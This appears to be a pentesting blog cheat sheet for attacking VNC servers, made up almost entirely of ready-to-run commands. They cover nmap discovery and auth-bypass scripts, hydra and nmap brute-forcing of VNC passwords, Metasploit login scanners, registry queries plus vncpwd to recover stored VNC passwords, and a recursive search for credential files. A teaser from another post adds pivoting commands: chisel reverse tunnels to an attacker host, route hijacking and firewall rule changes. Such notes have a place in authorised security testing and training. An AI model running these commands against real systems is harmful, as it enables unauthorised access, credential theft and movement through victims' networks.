Skip to main content

VNC Pentest


#nmap - Finding VNC Enabled Servers
nmap -Pn -p5900,5901,5902,5903,5905,5906 10.10.10.0/24

-p5910,5911,5912,5914,5915,5916

#Nmap Script Scan
nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p5900 10.10.10.10

#VNC brute using nmap
nmap -Pn -sV -p5900 --script vnc-brute 10.10.10.10
Metasploit Auth Scanning 

use auxiliary/scanner/vnc/vnc_none_auth
set RHOSTS 192.168.1.0/24
set THREADS 50
run

or use 
use auxiliary/scanner/vnc/vnc_login
Brute forcing VNC Creds

hydra -s 5901 -P pass.txt -t 16 10.10.10.10 vnc
VNC 4 --> Real VNC 4 - Auth Bypass 
Get VNC Password from Registry

reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKCU\Software\TightVNC\Server /v PasswordViewOnly"
vncpwd.exe PASSWORD_FROM_ABOVE
Search for keyword "pass,cred,vnc and config"

dir /s *pass* == *cred* == *vnc* == *.config*



 

Comments

Popular posts from this blog

Pivoting into an internal network behind firewall

    Accessing a Victim network from Windows box which is pivoted to Kali #On Kali sshuttle --listen 0.0.0.0 -r user@10.10.10.10 192.168.1.0/24 or ./chisel server --port 9001 -reverse #On Victim ./chisel.exe client 10.10.10.1:9001 R:0.0.0.0:1080:socks .\chisel.exe client 10.10.10.1:9001 R:8080:127.0.0.1:8080 R:8888:127.0.0.1:8888 R:9090:127.0.0.1:9090 #On windows route print #delete default route route delete 0.0.0.0 #add a new route to kali- setting kali ip as gateway; kali_ip=which is on the same subnet as the windows box route add 0.0.0.0 mask 0.0.0.0 KALI_IP #Now you should be able to access all the sites which are accessible on kali from windows box. #If the above doesnt work #asuming Kali and windows are on Eht0 #add a firewall rule to allow Kali ip traffic netsh advfirewall firewall add rule name="Allow VPN Traffic" dir=in action=allow protocol=any remoteip=KALI_ETH0_IP #on Kali - Allow tun0 traffic to forward on iptables sudo iptables -P FORWARD ACCEPT ...